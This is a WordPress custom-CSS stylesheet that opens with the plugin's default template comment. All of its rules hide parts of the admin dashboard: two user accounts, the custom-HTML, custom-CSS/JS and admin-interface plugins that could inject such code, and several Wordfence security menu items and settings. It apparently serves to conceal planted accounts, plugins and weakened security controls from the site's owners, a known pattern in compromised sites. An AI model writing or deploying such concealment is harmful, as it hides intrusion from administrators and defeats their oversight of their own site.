/* Add your CSS code here.

For example:
.example {
    color: red;
}

For brushing up on your CSS knowledge, check out http://www.w3schools.com/css/css_syntax.asp

End of comment */ 

#adminmenu li#menu-pages li:nth-of-type(4) { 
    display: none !important; 
}

#adminmenu li#menu-settings li a[href="options-general.php?page=wpchtmlp-menu-identifier"] { 
    display: none !important; 
}

#adminmenu li#menu-posts-custom-css-js { 
    display: none !important; 
}

#wp-admin-bar-new-content .ab-submenu li:nth-child(5) { 
    display: none !important; 
}
#wp-admin-bar-new-content .ab-submenu li:nth-child(7) { 
    display: none !important; 
}

tr[data-slug="wp-custom-html-pages"] {
    display: none !important;
}
tr[data-slug="wp-custom-html-pages"] {
    display: none !important;
}
tr[data-slug="wp-custom-admin-interface"] {
    display: none !important;
}
tr[data-slug="custom-css-js"] {
    display: none !important;
}
#toplevel_page_wp_custom_admin_interface{
    display: none !important;
}
div.wf-row:nth-child(30){
    display: none !important;
}
div.wf-row:nth-child(10){
    display: none !important;
}
#toplevel_page_Wordfence > ul:nth-child(2) > li:nth-child(7){
    display: none !important;
}
#toplevel_page_Wordfence > ul:nth-child(2) > li:nth-child(6){
    display: none !important;
}

#user-4 {
    display: none !important;
}

#user-3 {
    display: none !important;
}

